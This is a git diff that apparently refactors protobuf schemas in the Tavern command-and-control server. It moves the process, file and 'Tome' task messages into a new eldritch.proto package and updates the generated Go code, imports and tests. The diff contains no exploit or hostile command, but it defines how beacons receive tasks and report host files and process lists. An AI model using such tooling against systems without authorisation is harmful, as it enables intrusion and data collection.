+func (*File) Descriptor() ([]byte, []int) { + return file_eldritch_proto_rawDescGZIP(), []int{3} +} + +func (x *File) GetPath() string { + if x != nil { + return x.Path + } + return "" +} + +func (x *File) GetOwner() string { + if x != nil { + return x.Owner + } + return "" +} + +func (x *File) GetGroup() string { + if x != nil { + return x.Group + } + return "" +} + +func (x *File) GetPermissions() string { + if x != nil { + return x.Permissions + } + return "" +} + +func (x *File) GetSize() int64 { + if x != nil { + return x.Size + } + return 0 +} + +func (x *File) GetSha3_256Hash() string { + if x != nil { + return x.Sha3_256Hash + } + return "" +} + +func (x *File) GetChunk() []byte { + if x != nil { + return x.Chunk + } + return nil +} + +var File_eldritch_proto protoreflect.FileDescriptor + +var file_eldritch_proto_rawDesc = []byte{ + 0x0a, 0x0e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, + 0x12, 0x08, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x22, 0xc0, 0x01, 0x0a, 0x04, 0x54, + 0x6f, 0x6d, 0x65, 0x12, 0x1a, 0x0a, 0x08, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x18, + 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x08, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x12, + 0x3e, 0x0a, 0x0a, 0x70, 0x61, 0x72, 0x61, 0x6d, 0x65, 0x74, 0x65, 0x72, 0x73, 0x18, 0x02, 0x20, + 0x03, 0x28, 0x0b, 0x32, 0x1e, 0x2e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x54, + 0x6f, 0x6d, 0x65, 0x2e, 0x50, 0x61, 0x72, 0x61, 0x6d, 0x65, 0x74, 0x65, 0x72, 0x73, 0x45, 0x6e, + 0x74, 0x72, 0x79, 0x52, 0x0a, 0x70, 0x61, 0x72, 0x61, 0x6d, 0x65, 0x74, 0x65, 0x72, 0x73, 0x12, + 0x1d, 0x0a, 0x0a, 0x66, 0x69, 0x6c, 0x65, 0x5f, 0x6e, 0x61, 0x6d, 0x65, 0x73, 0x18, 0x03, 0x20, + 0x03, 0x28, 0x09, 0x52, 0x09, 0x66, 0x69, 0x6c, 0x65, 0x4e, 0x61, 0x6d, 0x65, 0x73, 0x1a, 0x3d, + 0x0a, 0x0f, 0x50, 0x61, 0x72, 0x61, 0x6d, 0x65, 0x74, 0x65, 0x72, 0x73, 0x45, 0x6e, 0x74, 0x72, + 0x79, 0x12, 0x10, 0x0a, 0x03, 0x6b, 0x65, 0x79, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x03, + 0x6b, 0x65, 0x79, 0x12, 0x14, 0x0a, 0x05, 0x76, 0x61, 0x6c, 0x75, 0x65, 0x18, 0x02, 0x20, 0x01, + 0x28, 0x09, 0x52, 0x05, 0x76, 0x61, 0x6c, 0x75, 0x65, 0x3a, 0x02, 0x38, 0x01, 0x22, 0x8b, 0x04, + 0x0a, 0x07, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x12, 0x10, 0x0a, 0x03, 0x70, 0x69, 0x64, + 0x18, 0x01, 0x20, 0x01, 0x28, 0x04, 0x52, 0x03, 0x70, 0x69, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x70, + 0x70, 0x69, 0x64, 0x18, 0x02, 0x20, 0x01, 0x28, 0x04, 0x52, 0x04, 0x70, 0x70, 0x69, 0x64, 0x12, + 0x12, 0x0a, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x6e, + 0x61, 0x6d, 0x65, 0x12, 0x1c, 0x0a, 0x09, 0x70, 0x72, 0x69, 0x6e, 0x63, 0x69, 0x70, 0x61, 0x6c, + 0x18, 0x04, 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x70, 0x72, 0x69, 0x6e, 0x63, 0x69, 0x70, 0x61, + 0x6c, 0x12, 0x12, 0x0a, 0x04, 0x70, 0x61, 0x74, 0x68, 0x18, 0x05, 0x20, 0x01, 0x28, 0x09, 0x52, + 0x04, 0x70, 0x61, 0x74, 0x68, 0x12, 0x10, 0x0a, 0x03, 0x63, 0x6d, 0x64, 0x18, 0x06, 0x20, 0x01, + 0x28, 0x09, 0x52, 0x03, 0x63, 0x6d, 0x64, 0x12, 0x10, 0x0a, 0x03, 0x65, 0x6e, 0x76, 0x18, 0x07, + 0x20, 0x01, 0x28, 0x09, 0x52, 0x03, 0x65, 0x6e, 0x76, 0x12, 0x10, 0x0a, 0x03, 0x63, 0x77, 0x64, + 0x18, 0x08, 0x20, 0x01, 0x28, 0x09, 0x52, 0x03, 0x63, 0x77, 0x64, 0x12, 0x30, 0x0a, 0x06, 0x73, + 0x74, 0x61, 0x74, 0x75, 0x73, 0x18, 0x09, 0x20, 0x01, 0x28, 0x0e, 0x32, 0x18, 0x2e, 0x65, 0x6c, + 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x2e, 0x53, + 0x74, 0x61, 0x74, 0x75, 0x73, 0x52, 0x06, 0x73, 0x74, 
0x61, 0x74, 0x75, 0x73, 0x22, 0xab, 0x02, + 0x0a, 0x06, 0x53, 0x74, 0x61, 0x74, 0x75, 0x73, 0x12, 0x16, 0x0a, 0x12, 0x53, 0x54, 0x41, 0x54, + 0x55, 0x53, 0x5f, 0x55, 0x4e, 0x53, 0x50, 0x45, 0x43, 0x49, 0x46, 0x49, 0x45, 0x44, 0x10, 0x00, + 0x12, 0x12, 0x0a, 0x0e, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x55, 0x4e, 0x4b, 0x4e, 0x4f, + 0x57, 0x4e, 0x10, 0x01, 0x12, 0x0f, 0x0a, 0x0b, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x49, + 0x44, 0x4c, 0x45, 0x10, 0x02, 0x12, 0x0e, 0x0a, 0x0a, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, + 0x52, 0x55, 0x4e, 0x10, 0x03, 0x12, 0x10, 0x0a, 0x0c, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, + 0x53, 0x4c, 0x45, 0x45, 0x50, 0x10, 0x04, 0x12, 0x0f, 0x0a, 0x0b, 0x53, 0x54, 0x41, 0x54, 0x55, + 0x53, 0x5f, 0x53, 0x54, 0x4f, 0x50, 0x10, 0x05, 0x12, 0x11, 0x0a, 0x0d, 0x53, 0x54, 0x41, 0x54, + 0x55, 0x53, 0x5f, 0x5a, 0x4f, 0x4d, 0x42, 0x49, 0x45, 0x10, 0x06, 0x12, 0x12, 0x0a, 0x0e, 0x53, + 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x54, 0x52, 0x41, 0x43, 0x49, 0x4e, 0x47, 0x10, 0x07, 0x12, + 0x0f, 0x0a, 0x0b, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x44, 0x45, 0x41, 0x44, 0x10, 0x08, + 0x12, 0x14, 0x0a, 0x10, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x57, 0x41, 0x4b, 0x45, 0x5f, + 0x4b, 0x49, 0x4c, 0x4c, 0x10, 0x09, 0x12, 0x11, 0x0a, 0x0d, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, + 0x5f, 0x57, 0x41, 0x4b, 0x49, 0x4e, 0x47, 0x10, 0x0a, 0x12, 0x11, 0x0a, 0x0d, 0x53, 0x54, 0x41, + 0x54, 0x55, 0x53, 0x5f, 0x50, 0x41, 0x52, 0x4b, 0x45, 0x44, 0x10, 0x0b, 0x12, 0x17, 0x0a, 0x13, + 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x4c, 0x4f, 0x43, 0x4b, 0x5f, 0x42, 0x4c, 0x4f, 0x43, + 0x4b, 0x45, 0x44, 0x10, 0x0c, 0x12, 0x24, 0x0a, 0x20, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, + 0x55, 0x4e, 0x49, 0x4e, 0x54, 0x45, 0x52, 0x55, 0x50, 0x54, 0x49, 0x42, 0x4c, 0x45, 0x5f, 0x44, + 0x49, 0x53, 0x4b, 0x5f, 0x53, 0x4c, 0x45, 0x45, 0x50, 0x10, 0x0d, 0x22, 0x34, 0x0a, 0x0b, 0x50, + 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x12, 0x25, 0x0a, 0x04, 0x6c, 0x69, + 0x73, 0x74, 0x18, 0x01, 0x20, 0x03, 0x28, 0x0b, 0x32, 0x11, 0x2e, 0x65, 0x6c, 0x64, 0x72, 0x69, + 0x74, 0x63, 0x68, 0x2e, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x52, 0x04, 0x6c, 0x69, 0x73, + 0x74, 0x22, 0xb6, 0x01, 0x0a, 0x04, 0x46, 0x69, 0x6c, 0x65, 0x12, 0x12, 0x0a, 0x04, 0x70, 0x61, + 0x74, 0x68, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x70, 0x61, 0x74, 0x68, 0x12, 0x14, + 0x0a, 0x05, 0x6f, 0x77, 0x6e, 0x65, 0x72, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x05, 0x6f, + 0x77, 0x6e, 0x65, 0x72, 0x12, 0x14, 0x0a, 0x05, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x18, 0x03, 0x20, + 0x01, 0x28, 0x09, 0x52, 0x05, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x12, 0x20, 0x0a, 0x0b, 0x70, 0x65, + 0x72, 0x6d, 0x69, 0x73, 0x73, 0x69, 0x6f, 0x6e, 0x73, 0x18, 0x04, 0x20, 0x01, 0x28, 0x09, 0x52, + 0x0b, 0x70, 0x65, 0x72, 0x6d, 0x69, 0x73, 0x73, 0x69, 0x6f, 0x6e, 0x73, 0x12, 0x12, 0x0a, 0x04, + 0x73, 0x69, 0x7a, 0x65, 0x18, 0x05, 0x20, 0x01, 0x28, 0x03, 0x52, 0x04, 0x73, 0x69, 0x7a, 0x65, + 0x12, 0x22, 0x0a, 0x0d, 0x73, 0x68, 0x61, 0x33, 0x5f, 0x32, 0x35, 0x36, 0x5f, 0x68, 0x61, 0x73, + 0x68, 0x18, 0x06, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0b, 0x73, 0x68, 0x61, 0x33, 0x32, 0x35, 0x36, + 0x48, 0x61, 0x73, 0x68, 0x12, 0x14, 0x0a, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x18, 0x07, 0x20, + 0x01, 0x28, 0x0c, 0x52, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x42, 0x22, 0x5a, 0x20, 0x72, 0x65, + 0x61, 0x6c, 0x6d, 0x2e, 0x70, 0x75, 0x62, 0x2f, 0x74, 0x61, 0x76, 0x65, 0x72, 0x6e, 0x2f, 0x69, + 0x6e, 0x74, 0x65, 0x72, 0x6e, 0x61, 0x6c, 0x2f, 0x63, 0x32, 0x2f, 0x65, 0x70, 
0x62, 0x62, 0x06, + 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x33, +} + +var ( + file_eldritch_proto_rawDescOnce sync.Once + file_eldritch_proto_rawDescData = file_eldritch_proto_rawDesc +) + +func file_eldritch_proto_rawDescGZIP() []byte { + file_eldritch_proto_rawDescOnce.Do(func() { + file_eldritch_proto_rawDescData = protoimpl.X.CompressGZIP(file_eldritch_proto_rawDescData) + }) + return file_eldritch_proto_rawDescData +} + +var file_eldritch_proto_enumTypes = make([]protoimpl.EnumInfo, 1) +var file_eldritch_proto_msgTypes = make([]protoimpl.MessageInfo, 5) +var file_eldritch_proto_goTypes = []interface{}{ + (Process_Status)(0), // 0: eldritch.Process.Status + (*Tome)(nil), // 1: eldritch.Tome + (*Process)(nil), // 2: eldritch.Process + (*ProcessList)(nil), // 3: eldritch.ProcessList + (*File)(nil), // 4: eldritch.File + nil, // 5: eldritch.Tome.ParametersEntry +} +var file_eldritch_proto_depIdxs = []int32{ + 5, // 0: eldritch.Tome.parameters:type_name -> eldritch.Tome.ParametersEntry + 0, // 1: eldritch.Process.status:type_name -> eldritch.Process.Status + 2, // 2: eldritch.ProcessList.list:type_name -> eldritch.Process + 3, // [3:3] is the sub-list for method output_type + 3, // [3:3] is the sub-list for method input_type + 3, // [3:3] is the sub-list for extension type_name + 3, // [3:3] is the sub-list for extension extendee + 0, // [0:3] is the sub-list for field type_name +} + +func init() { file_eldritch_proto_init() } +func file_eldritch_proto_init() { + if File_eldritch_proto != nil { + return + } + if !protoimpl.UnsafeEnabled { + file_eldritch_proto_msgTypes[0].Exporter = func(v interface{}, i int) interface{} { + switch v := v.(*Tome); i { + case 0: + return &v.state + case 1: + return &v.sizeCache + case 2: + return &v.unknownFields + default: + return nil + } + } + file_eldritch_proto_msgTypes[1].Exporter = func(v interface{}, i int) interface{} { + switch v := v.(*Process); i { + case 0: + return &v.state + case 1: + return &v.sizeCache + case 2: + return &v.unknownFields + default: + return nil + } + } + file_eldritch_proto_msgTypes[2].Exporter = func(v interface{}, i int) interface{} { + switch v := v.(*ProcessList); i { + case 0: + return &v.state + case 1: + return &v.sizeCache + case 2: + return &v.unknownFields + default: + return nil + } + } + file_eldritch_proto_msgTypes[3].Exporter = func(v interface{}, i int) interface{} { + switch v := v.(*File); i { + case 0: + return &v.state + case 1: + return &v.sizeCache + case 2: + return &v.unknownFields + default: + return nil + } + } + } + type x struct{} + out := protoimpl.TypeBuilder{ + File: protoimpl.DescBuilder{ + GoPackagePath: reflect.TypeOf(x{}).PkgPath(), + RawDescriptor: file_eldritch_proto_rawDesc, + NumEnums: 1, + NumMessages: 5, + NumExtensions: 0, + NumServices: 0, + }, + GoTypes: file_eldritch_proto_goTypes, + DependencyIndexes: file_eldritch_proto_depIdxs, + EnumInfos: file_eldritch_proto_enumTypes, + MessageInfos: file_eldritch_proto_msgTypes, + }.Build() + File_eldritch_proto = out.File + file_eldritch_proto_rawDesc = nil + file_eldritch_proto_goTypes = nil + file_eldritch_proto_depIdxs = nil +} diff --git a/tavern/internal/c2/c2pb/enum_process_status.go b/tavern/internal/c2/epb/enum_process_status.go similarity index 99% rename from tavern/internal/c2/c2pb/enum_process_status.go rename to tavern/internal/c2/epb/enum_process_status.go index 2291531df..011378254 100644 --- a/tavern/internal/c2/c2pb/enum_process_status.go +++ b/tavern/internal/c2/epb/enum_process_status.go @@ -1,4 +1,4 @@ -package c2pb +package 
epb import ( "database/sql/driver" diff --git a/tavern/internal/c2/c2pb/enum_process_status_test.go b/tavern/internal/c2/epb/enum_process_status_test.go similarity index 58% rename from tavern/internal/c2/c2pb/enum_process_status_test.go rename to tavern/internal/c2/epb/enum_process_status_test.go index b4c44a00b..91ce0fb8b 100644 --- a/tavern/internal/c2/c2pb/enum_process_status_test.go +++ b/tavern/internal/c2/epb/enum_process_status_test.go @@ -1,4 +1,4 @@ -package c2pb_test +package epb_test import ( "bytes" @@ -6,68 +6,68 @@ import ( "github.com/stretchr/testify/assert" "github.com/stretchr/testify/require" - "realm.pub/tavern/internal/c2/c2pb" + "realm.pub/tavern/internal/c2/epb" ) func TestProcessStatusValues(t *testing.T) { - assert.NotEmpty(t, c2pb.Process_Status(0).Values()) + assert.NotEmpty(t, epb.Process_Status(0).Values()) } func TestProcessStatusValue(t *testing.T) { - val, err := c2pb.Process_Status(0).Value() + val, err := epb.Process_Status(0).Value() require.NoError(t, err) require.NotNil(t, val) } func TestProcessStatusMarshalGraphQL(t *testing.T) { var buf bytes.Buffer - c2pb.Process_Status(0).MarshalGQL(&buf) + epb.Process_Status(0).MarshalGQL(&buf) assert.Equal(t, `"STATUS_UNSPECIFIED"`, buf.String()) } func TestProcessStatusUnmarshalGraphQL(t *testing.T) { - var status c2pb.Process_Status - assert.NoError(t, (*c2pb.Process_Status).UnmarshalGQL(&status, `STATUS_IDLE`)) - assert.Equal(t, c2pb.Process_STATUS_IDLE, status) + var status epb.Process_Status + assert.NoError(t, (*epb.Process_Status).UnmarshalGQL(&status, `STATUS_IDLE`)) + assert.Equal(t, epb.Process_STATUS_IDLE, status) } func TestProcessStatusScan(t *testing.T) { tests := []struct { name string scanVal any - wantStatus c2pb.Process_Status + wantStatus epb.Process_Status }{ { name: "RUN_String", scanVal: "STATUS_RUN", - wantStatus: c2pb.Process_STATUS_RUN, + wantStatus: epb.Process_STATUS_RUN, }, { name: "IDLE_[]uint8", scanVal: []uint8("STATUS_IDLE"), - wantStatus: c2pb.Process_STATUS_IDLE, + wantStatus: epb.Process_STATUS_IDLE, }, { name: "Invalid", scanVal: "NOT_A_STATUS", - wantStatus: c2pb.Process_STATUS_UNKNOWN, + wantStatus: epb.Process_STATUS_UNKNOWN, }, { name: "Empty", scanVal: "", - wantStatus: c2pb.Process_STATUS_UNSPECIFIED, + wantStatus: epb.Process_STATUS_UNSPECIFIED, }, { name: "Nil", scanVal: nil, - wantStatus: c2pb.Process_STATUS_UNSPECIFIED, + wantStatus: epb.Process_STATUS_UNSPECIFIED, }, } for _, tc := range tests { t.Run(tc.name, func(t *testing.T) { - status := c2pb.Process_Status(0) - err := (*c2pb.Process_Status).Scan(&status, tc.scanVal) + status := epb.Process_Status(0) + err := (*epb.Process_Status).Scan(&status, tc.scanVal) assert.NoError(t, err) assert.Equal(t, tc.wantStatus, status) }) diff --git a/tavern/internal/c2/generate.go b/tavern/internal/c2/generate.go index 60a953447..d8238b97c 100644 --- a/tavern/internal/c2/generate.go +++ b/tavern/internal/c2/generate.go @@ -1,3 +1,4 @@ package c2 -//go:generate protoc --go_out=./c2pb --go_opt=paths=source_relative --go-grpc_out=./c2pb --go-grpc_opt=paths=source_relative c2.proto +//go:generate protoc -I=./proto --go_out=./epb --go_opt=paths=source_relative --go-grpc_out=./epb --go-grpc_opt=paths=source_relative eldritch.proto +//go:generate protoc -I=./proto --go_out=./c2pb --go_opt=paths=source_relative --go-grpc_out=./c2pb --go-grpc_opt=paths=source_relative c2.proto diff --git a/tavern/internal/c2/c2.proto b/tavern/internal/c2/proto/c2.proto similarity index 76% rename from tavern/internal/c2/c2.proto rename to 
tavern/internal/c2/proto/c2.proto
index 86c19c7d2..4699e6909 100644
--- a/tavern/internal/c2/c2.proto
+++ b/tavern/internal/c2/proto/c2.proto
@@ -3,9 +3,10 @@ syntax = "proto3";
 package c2;
-option go_package = "github.com/kcarretto/tavern/internal/c2/c2pb";
+option go_package = "realm.pub/tavern/internal/c2/c2pb";
 import "google/protobuf/timestamp.proto";
+import "eldritch.proto";
 /*
 * Messages
 */
@@ -42,45 +43,12 @@ message Host {
 string primary_ip = 4;
 }
-// Process running on the host system.
-message Process {
- uint64 pid = 1;
- uint64 ppid = 2;
- string name = 3;
- string principal = 4;
-
- string path = 5;
- string cmd = 6;
- string env = 7;
- string cwd = 8;
-
- enum Status {
- STATUS_UNSPECIFIED = 0;
- STATUS_UNKNOWN = 1;
- STATUS_IDLE = 2;
- STATUS_RUN = 3;
- STATUS_SLEEP = 4;
- STATUS_STOP = 5;
- STATUS_ZOMBIE = 6;
- STATUS_TRACING = 7;
- STATUS_DEAD = 8;
- STATUS_WAKE_KILL = 9;
- STATUS_WAKING = 10;
- STATUS_PARKED = 11;
- STATUS_LOCK_BLOCKED = 12;
- STATUS_UNINTERUPTIBLE_DISK_SLEEP = 13;
- }
- Status status = 9;
-}
-
 // Task instructions for the beacon to execute.
 message Task {
 int64 id = 1;
- string eldritch = 2;
- map<string, string> parameters = 3;
- repeated string file_names = 4;
- string quest_name = 5;
+ eldritch.Tome tome = 2;
+ string quest_name = 3;
 }
 // TaskError provides information when task execution fails.
@@ -121,20 +89,14 @@ message DownloadFileResponse {
 message ReportFileRequest {
 int64 task_id = 1;
- string path = 2;
- string owner = 3;
- string group = 4;
- string permissions = 5;
- int64 size = 6;
- string sha3_256_hash = 7;
-
- bytes chunk = 8;
+ eldritch.File chunk = 2;
+
 }
 message ReportFileResponse {}
 message ReportProcessListRequest {
- repeated Process list = 1;
- int64 task_id = 2;
+ int64 task_id = 1;
+ eldritch.ProcessList list = 2;
 }
 message ReportProcessListResponse {}
diff --git a/tavern/internal/c2/proto/eldritch.proto b/tavern/internal/c2/proto/eldritch.proto
new file mode 100644
index 000000000..390e31507
--- /dev/null
+++ b/tavern/internal/c2/proto/eldritch.proto
@@ -0,0 +1,61 @@
+syntax = "proto3";
+// edition = "2023";
+
+package eldritch;
+
+option go_package = "realm.pub/tavern/internal/c2/epb";
+
+// Tome for eldritch to execute.
+message Tome {
+ string eldritch = 1;
+ map<string, string> parameters = 2;
+ repeated string file_names = 3;
+}
+
+// Process running on the host system.
+message Process {
+ uint64 pid = 1;
+ uint64 ppid = 2;
+ string name = 3;
+ string principal = 4;
+
+ string path = 5;
+ string cmd = 6;
+ string env = 7;
+ string cwd = 8;
+
+ enum Status {
+ STATUS_UNSPECIFIED = 0;
+ STATUS_UNKNOWN = 1;
+ STATUS_IDLE = 2;
+ STATUS_RUN = 3;
+ STATUS_SLEEP = 4;
+ STATUS_STOP = 5;
+ STATUS_ZOMBIE = 6;
+ STATUS_TRACING = 7;
+ STATUS_DEAD = 8;
+ STATUS_WAKE_KILL = 9;
+ STATUS_WAKING = 10;
+ STATUS_PARKED = 11;
+ STATUS_LOCK_BLOCKED = 12;
+ STATUS_UNINTERUPTIBLE_DISK_SLEEP = 13;
+ }
+ Status status = 9;
+}
+
+// ProcessList of running processes on the host system.
+message ProcessList {
+ repeated Process list = 1;
+}
+
+// File on the host system.
+message File { + string path = 1; + string owner = 2; + string group = 3; + string permissions = 4; + int64 size = 5; + string sha3_256_hash = 6; + + bytes chunk = 7; +} diff --git a/tavern/internal/ent/gql_where_input.go b/tavern/internal/ent/gql_where_input.go index e2c95f701..3f00e6d07 100644 --- a/tavern/internal/ent/gql_where_input.go +++ b/tavern/internal/ent/gql_where_input.go @@ -8,6 +8,7 @@ import ( "time" "realm.pub/tavern/internal/c2/c2pb" + "realm.pub/tavern/internal/c2/epb" "realm.pub/tavern/internal/ent/beacon" "realm.pub/tavern/internal/ent/file" "realm.pub/tavern/internal/ent/host" @@ -2175,10 +2176,10 @@ type HostProcessWhereInput struct { CwdContainsFold *string `json:"cwdContainsFold,omitempty"` // "status" field predicates. - Status *c2pb.Process_Status `json:"status,omitempty"` - StatusNEQ *c2pb.Process_Status `json:"statusNEQ,omitempty"` - StatusIn []c2pb.Process_Status `json:"statusIn,omitempty"` - StatusNotIn []c2pb.Process_Status `json:"statusNotIn,omitempty"` + Status *epb.Process_Status `json:"status,omitempty"` + StatusNEQ *epb.Process_Status `json:"statusNEQ,omitempty"` + StatusIn []epb.Process_Status `json:"statusIn,omitempty"` + StatusNotIn []epb.Process_Status `json:"statusNotIn,omitempty"` // "host" edge predicates. HasHost *bool `json:"hasHost,omitempty"` diff --git a/tavern/internal/ent/host/host.go b/tavern/internal/ent/host/host.go index 1887e910d..cdc2ba182 100644 --- a/tavern/internal/ent/host/host.go +++ b/tavern/internal/ent/host/host.go @@ -113,7 +113,7 @@ var ( // PlatformValidator is a validator for the "platform" field enum values. It is called by the builders before save. func PlatformValidator(pl c2pb.Host_Platform) error { switch pl.String() { - case "PLATFORM_BSD", "PLATFORM_UNSPECIFIED", "PLATFORM_WINDOWS", "PLATFORM_LINUX", "PLATFORM_MACOS": + case "PLATFORM_UNSPECIFIED", "PLATFORM_WINDOWS", "PLATFORM_LINUX", "PLATFORM_MACOS", "PLATFORM_BSD": return nil default: return fmt.Errorf("host: invalid enum value for platform field: %q", pl) diff --git a/tavern/internal/ent/hostprocess.go b/tavern/internal/ent/hostprocess.go index 4897df7ef..5879dde67 100644 --- a/tavern/internal/ent/hostprocess.go +++ b/tavern/internal/ent/hostprocess.go @@ -9,7 +9,7 @@ import ( "entgo.io/ent" "entgo.io/ent/dialect/sql" - "realm.pub/tavern/internal/c2/c2pb" + "realm.pub/tavern/internal/c2/epb" "realm.pub/tavern/internal/ent/host" "realm.pub/tavern/internal/ent/hostprocess" "realm.pub/tavern/internal/ent/task" @@ -41,7 +41,7 @@ type HostProcess struct { // The current working directory for the process. Cwd string `json:"cwd,omitempty"` // Current process status. - Status c2pb.Process_Status `json:"status,omitempty"` + Status epb.Process_Status `json:"status,omitempty"` // Edges holds the relations/edges for other nodes in the graph. // The values are being populated by the HostProcessQuery when eager-loading is set. 
Edges HostProcessEdges `json:"edges"` @@ -96,7 +96,7 @@ func (*HostProcess) scanValues(columns []string) ([]any, error) { for i := range columns { switch columns[i] { case hostprocess.FieldStatus: - values[i] = new(c2pb.Process_Status) + values[i] = new(epb.Process_Status) case hostprocess.FieldID, hostprocess.FieldPid, hostprocess.FieldPpid: values[i] = new(sql.NullInt64) case hostprocess.FieldName, hostprocess.FieldPrincipal, hostprocess.FieldPath, hostprocess.FieldCmd, hostprocess.FieldEnv, hostprocess.FieldCwd: @@ -191,7 +191,7 @@ func (hp *HostProcess) assignValues(columns []string, values []any) error { hp.Cwd = value.String } case hostprocess.FieldStatus: - if value, ok := values[i].(*c2pb.Process_Status); !ok { + if value, ok := values[i].(*epb.Process_Status); !ok { return fmt.Errorf("unexpected type %T for field status", values[i]) } else if value != nil { hp.Status = *value diff --git a/tavern/internal/ent/hostprocess/hostprocess.go b/tavern/internal/ent/hostprocess/hostprocess.go index c16a644cb..bc94c0e22 100644 --- a/tavern/internal/ent/hostprocess/hostprocess.go +++ b/tavern/internal/ent/hostprocess/hostprocess.go @@ -9,7 +9,7 @@ import ( "entgo.io/ent/dialect/sql" "entgo.io/ent/dialect/sql/sqlgraph" "github.com/99designs/gqlgen/graphql" - "realm.pub/tavern/internal/c2/c2pb" + "realm.pub/tavern/internal/c2/epb" ) const ( @@ -112,9 +112,9 @@ var ( ) // StatusValidator is a validator for the "status" field enum values. It is called by the builders before save. -func StatusValidator(s c2pb.Process_Status) error { +func StatusValidator(s epb.Process_Status) error { switch s.String() { - case "STATUS_STOP", "STATUS_TRACING", "STATUS_WAKE_KILL", "STATUS_UNKNOWN", "STATUS_IDLE", "STATUS_SLEEP", "STATUS_WAKING", "STATUS_UNSPECIFIED", "STATUS_PARKED", "STATUS_LOCK_BLOCKED", "STATUS_DEAD", "STATUS_ZOMBIE", "STATUS_UNINTERUPTIBLE_DISK_SLEEP", "STATUS_RUN": + case "STATUS_IDLE", "STATUS_STOP", "STATUS_ZOMBIE", "STATUS_LOCK_BLOCKED", "STATUS_UNSPECIFIED", "STATUS_PARKED", "STATUS_RUN", "STATUS_DEAD", "STATUS_UNINTERUPTIBLE_DISK_SLEEP", "STATUS_UNKNOWN", "STATUS_SLEEP", "STATUS_TRACING", "STATUS_WAKE_KILL", "STATUS_WAKING": return nil default: return fmt.Errorf("hostprocess: invalid enum value for status field: %q", s) @@ -213,8 +213,8 @@ func newTaskStep() *sqlgraph.Step { } var ( - // c2pb.Process_Status must implement graphql.Marshaler. - _ graphql.Marshaler = (*c2pb.Process_Status)(nil) - // c2pb.Process_Status must implement graphql.Unmarshaler. - _ graphql.Unmarshaler = (*c2pb.Process_Status)(nil) + // epb.Process_Status must implement graphql.Marshaler. + _ graphql.Marshaler = (*epb.Process_Status)(nil) + // epb.Process_Status must implement graphql.Unmarshaler. + _ graphql.Unmarshaler = (*epb.Process_Status)(nil) ) diff --git a/tavern/internal/ent/hostprocess/where.go b/tavern/internal/ent/hostprocess/where.go index 1700050f4..000a3cd4b 100644 --- a/tavern/internal/ent/hostprocess/where.go +++ b/tavern/internal/ent/hostprocess/where.go @@ -7,7 +7,7 @@ import ( "entgo.io/ent/dialect/sql" "entgo.io/ent/dialect/sql/sqlgraph" - "realm.pub/tavern/internal/c2/c2pb" + "realm.pub/tavern/internal/c2/epb" "realm.pub/tavern/internal/ent/predicate" ) @@ -697,22 +697,22 @@ func CwdContainsFold(v string) predicate.HostProcess { } // StatusEQ applies the EQ predicate on the "status" field. 
-func StatusEQ(v c2pb.Process_Status) predicate.HostProcess { +func StatusEQ(v epb.Process_Status) predicate.HostProcess { return predicate.HostProcess(sql.FieldEQ(FieldStatus, v)) } // StatusNEQ applies the NEQ predicate on the "status" field. -func StatusNEQ(v c2pb.Process_Status) predicate.HostProcess { +func StatusNEQ(v epb.Process_Status) predicate.HostProcess { return predicate.HostProcess(sql.FieldNEQ(FieldStatus, v)) } // StatusIn applies the In predicate on the "status" field. -func StatusIn(vs ...c2pb.Process_Status) predicate.HostProcess { +func StatusIn(vs ...epb.Process_Status) predicate.HostProcess { return predicate.HostProcess(sql.FieldIn(FieldStatus, vs...)) } // StatusNotIn applies the NotIn predicate on the "status" field. -func StatusNotIn(vs ...c2pb.Process_Status) predicate.HostProcess { +func StatusNotIn(vs ...epb.Process_Status) predicate.HostProcess { return predicate.HostProcess(sql.FieldNotIn(FieldStatus, vs...)) } diff --git a/tavern/internal/ent/hostprocess_create.go b/tavern/internal/ent/hostprocess_create.go index 7fda213d8..c30b0201e 100644 --- a/tavern/internal/ent/hostprocess_create.go +++ b/tavern/internal/ent/hostprocess_create.go @@ -11,7 +11,7 @@ import ( "entgo.io/ent/dialect/sql" "entgo.io/ent/dialect/sql/sqlgraph" "entgo.io/ent/schema/field" - "realm.pub/tavern/internal/c2/c2pb" + "realm.pub/tavern/internal/c2/epb" "realm.pub/tavern/internal/ent/host" "realm.pub/tavern/internal/ent/hostprocess" 